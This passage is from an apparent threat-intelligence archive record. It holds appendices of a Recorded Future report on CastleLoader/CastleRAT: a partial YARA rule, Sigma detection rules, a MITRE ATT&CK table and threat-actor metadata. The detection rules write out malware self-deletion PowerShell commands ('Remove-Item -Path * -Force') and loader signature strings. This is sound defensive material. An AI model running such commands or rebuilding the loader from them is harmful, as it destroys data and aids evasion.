\"9WCga-\"\r\n strings:\r\n $s1 = \"SHELL64_OFFSET = \"\r\n $s2 = \"SHELL32_OFFSET = \"\r\n $s3 = \"SHELLFUNC = WINFUNCTYPE\"\r\n $s4 = \"LoadPE_Shell\"\r\n $s5 = \"crt = WinDLL(\\\"msvcrt.dll\\\");\"\r\n $s6 = \"OPEN_EXISTING\" fullword\r\n $s7 = \".VirtualProtect(\"\r\n $s8 = \"offset\"\r\n $s9 = \"from ctypes\"\r\n condition:\r\n filesize \u003c 50KB and $s9 at 0 and all of them\r\n}\r\nAppendix N: CastleRAT Sigma 
Rules\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 36 of 39\n\ntitle: CastleRAT C Variant Malware Log File Creation\r\nid: 4d785ac8-17fe-4765-b427-9a31073ad1a7\r\nstatus: stable\r\ndescription: Detects CastleRAT C variant malware log file creation events. The log file is used to store output from the keylogger and clipboard stea\r\nreferences:\r\n - https://tria.ge/250701-v6911aykv9\r\n - https://tria.ge/251101-r8f9xstjap\r\nauthor: Insikt Group, Recorded Future\r\ndate: 2025-08-29\r\nlevel: high\r\ntags:\r\n - attack.t1608 # Stage Capabilities\r\n - attack.t1074.001 # Local Data Staging\r\n - attack.t1115 # Clipboard Data\r\n - attack.t1056.001 # Keylogging\r\nlogsource:\r\n product: windows\r\n category: file_event\r\ndetection:\r\n castlerat_logs:\r\n TargetFilename|endswith:\r\n - '\\AppData\\Local\\Temp\\MuuuuuhGer3'\r\n - '\\AppData\\Local\\Temp\\PluhhSuk3'\r\n - '\\AppData\\Local\\Temp\\AsdDsaHaha3'\r\n - '\\AppData\\Local\\Temp\\ChuChuka'\r\n - '\\AppData\\Local\\Temp\\GagikMaraguiSS'\r\n - '\\AppData\\Local\\Temp\\LowUshrSudujes'\r\n - '\\AppData\\Local\\Temp\\RarnuiKarta'\r\n - '\\AppData\\Local\\Temp\\GrazGraznii'\r\n - '\\AppData\\Local\\Temp\\GiveGvein3'\r\n - '\\AppData\\Local\\Temp\\BeruiowdgsouiHTR'\r\n - '\\AppData\\Local\\Temp\\GDSongdsgndohSDU'\r\n - '\\AppData\\Local\\JohniiDepp'\r\n - '\\AppData\\Local\\LuchiiSvet'\r\n - '\\AppData\\Local\\HmmMaybe'\r\n condition: castlerat_logs\r\nfalsepositives:\r\n - Unlikely\r\ntitle: CastleRAT Python Malware Self Deletion\r\nid: 1050a0c4-1110-4b55-938c-0d27259ddd1e\r\nstatus: stable\r\ndescription: Detects the execution of powershell by the Python variant of CastleRAT malware to delete itself.\r\nreferences:\r\n - https://tria.ge/250822-r3a6qaak2t\r\nauthor: Insikt Group, Recorded Future\r\ndate: 2025-08-28\r\ntags:\r\n - attack.t1070.004 # Indicator Removal: File Deletion\r\nlogsource:\r\n product: windows\r\n category: 
process_creation\r\ndetection:\r\n self_delete:\r\n CommandLine|endswith: 'powershell Start-Sleep -Seconds 4; Remove-Item -Path * -Force; exit'\r\n condition: self_delete\r\nlevel: high\r\nfalsepositives:\r\n - Potential benign installer activity\r\ntitle: CastleRAT C Malware Self Deletion\r\nid: 79268bc8-3220-447d-bc7a-02199bed58e9\r\nstatus: stable\r\ndescription: Detects the execution of powershell by the C variant of CastleRAT malware to delete itself.\r\nreferences:\r\n - https://tria.ge/251101-lh19hstqft/behavioral2\r\nauthor: Insikt Group, Recorded Future\r\ndate: 2025-11-06\r\ntags:\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 37 of 39\n\n- attack.t1070.004 # Indicator Removal: File Deletion\r\nlogsource:\r\n product: windows\r\n category: process_creation\r\ndetection:\r\n self_delete:\r\n CommandLine|endswith: 'powershell Start-Sleep -Seconds 3; Remove-Item -Path * -Force'\r\n condition: self_delete\r\nlevel: high\r\nfalsepositives:\r\n - Potential benign installer activity\r\nAppendix O: MITRE ATT\u0026CK Techniques\r\nTactic: Technique ATT\u0026CK Code\r\nInitial Access: Phishing T1566\r\nInitial Access: Drive-by Compromise T1189\r\nExecution: User Execution: Malicious File T1204.002\r\nExecution: User Execution: Malicious Copy and Paste T1204.004\r\nExecution: Command and Scripting Interpreter: PowerShell T1059.001\r\nExecution: Command and Scripting Interpreter: AutoHotKey \u0026 AutoIT T1059.010\r\nResource Development: Acquire Infrastructure: Domains T1583.001\r\nResource Development: Acquire Infrastructure: Virtual Private Server T1583.003\r\nResource Development: Acquire Infrastructure: Server T1583.004\r\nResource Development: Acquire Access T1650\r\nResource Development: Obtain Capabilities: Tool T1588.002\r\nResource Development: Compromise Accounts: Email Accounts T1586.002\r\nDefense Evasion: Masquerading T1036\r\nCommand-and-Control: Proxy: External Proxy 
T1090.002\r\nCommand-and-Control: Application Layer Protocol: Web Protocols T1071.001\r\nCommand-and-Control: Ingress Tool Transfer T1105\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 38 of 39\n\nTactic: Technique ATT\u0026CK Code\r\nCollection: Data from Local System T1005\r\nSource: https://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 39 of 39",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries"
	],
	"report_names": [
		"graybravos-castleloader-activity-clusters-target-multiple-industries"
	],
	"threat_actors": [
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "dfee8b2e-d6b9-4143-a0d9-ca39396dd3bf",
			"created_at": "2022-10-25T16:07:24.467088Z",
			"updated_at": "2026-04-10T02:00:05.000485Z",
			"deleted_at": null,
			"main_name": "Circles",
			"aliases": [],
			"source_name": "ETDA:Circles",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "77b28afd-8187-4917-a453-1d5a279cb5e4",
			"created_at": "2022-10-25T15:50:23.768278Z",
			"updated_at": "2026-04-10T02:00:05.266635Z",
			"deleted_at": null,
			"main_name": "Inception",
			"aliases": [
				"Inception Framework",
				"Cloud Atlas"
			],
			"source_name": "MITRE:Inception",
			"tools": [
				"PowerShower",
				"VBShower",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "8a13b9be-e36d-4d48-9d19-5c93a62f862f",
			"created_at": "2026-03-08T02:00:03.472285Z",
			"updated_at": "2026-04-10T02:00:03.982274Z",
			"deleted_at": null,
			"main_name": "GrayBravo",
			"aliases": [
				"TAG-150"
			],
			"source_name": "MISPGALAXY:GrayBravo",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "1a76ed30-4daf-4817-98ae-87c667364464",
			"created_at": "2022-10-25T16:47:55.891029Z",
			"updated_at": "2026-04-10T02:00:03.646466Z",
			"deleted_at": null,
			"main_name": "IRON LIBERTY",
			"aliases": [
				"ALLANITE ",
				"ATK6 ",
				"BROMINE ",
				"CASTLE ",
				"Crouching Yeti ",
				"DYMALLOY ",
				"Dragonfly ",
				"Energetic Bear / Berserk Bear ",
				"Ghost Blizzard ",
				"TEMP.Isotope ",
				"TG-4192 "
			],
			"source_name": "Secureworks:IRON LIBERTY",
			"tools": [
				"ClientX",
				"Ddex Loader",
				"Havex",
				"Karagany",
				"Loek",
				"MCMD",
				"Sysmain",
				"xfrost"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d9b39228-0d9d-4c1e-8e39-2de986120060",
			"created_at": "2023-01-06T13:46:39.293127Z",
			"updated_at": "2026-04-10T02:00:03.277123Z",
			"deleted_at": null,
			"main_name": "BelialDemon",
			"aliases": [
				"Matanbuchus"
			],
			"source_name": "MISPGALAXY:BelialDemon",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434912,
	"ts_updated_at": 1775792300,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2ee5e2315e76fdf355ed8d5272dfb84e9a94ccdd.pdf",
		"text": "https://archive.orkl.eu/2ee5e2315e76fdf355ed8d5272dfb84e9a94ccdd.txt",
		"img": "https://archive.orkl.eu/2ee5e2315e76fdf355ed8d5272dfb84e9a94ccdd.jpg"
	}
}